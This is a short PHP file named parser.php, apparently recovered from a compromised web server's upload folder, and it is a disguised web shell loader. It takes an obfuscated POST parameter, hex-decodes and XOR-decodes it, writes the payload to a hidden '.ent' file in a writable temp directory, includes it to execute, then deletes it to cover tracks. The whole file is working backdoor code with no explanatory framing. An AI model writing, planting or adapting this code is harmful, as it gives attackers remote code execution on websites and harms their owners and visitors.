File: //proc/thread-self/root/proc/self/root/proc/self/root/proc/19805/cwd/2025/09/parser.php
<?php
if(isset($_POST["\x73\x79m"])){
$marker = hex2bin($_POST["\x73\x79m"]);
$itm = ''; $l = 0; while($l < strlen($marker)){$itm .= chr(ord($marker[$l]) ^ 25);$l++;}
$entry = array_filter([ini_get("upload_tmp_dir"), "/tmp", getenv("TMP"), "/dev/shm", session_save_path(), getcwd(), sys_get_temp_dir(), getenv("TEMP"), "/var/tmp"]);
foreach ($entry as $key => $factor) {
if (!!is_dir($factor) && !!is_writable($factor)) {
$record = vsprintf("%s/%s", [$factor, ".ent"]);
if (file_put_contents($record, $itm)) {
include $record;
@unlink($record);
exit;
}
}
}
}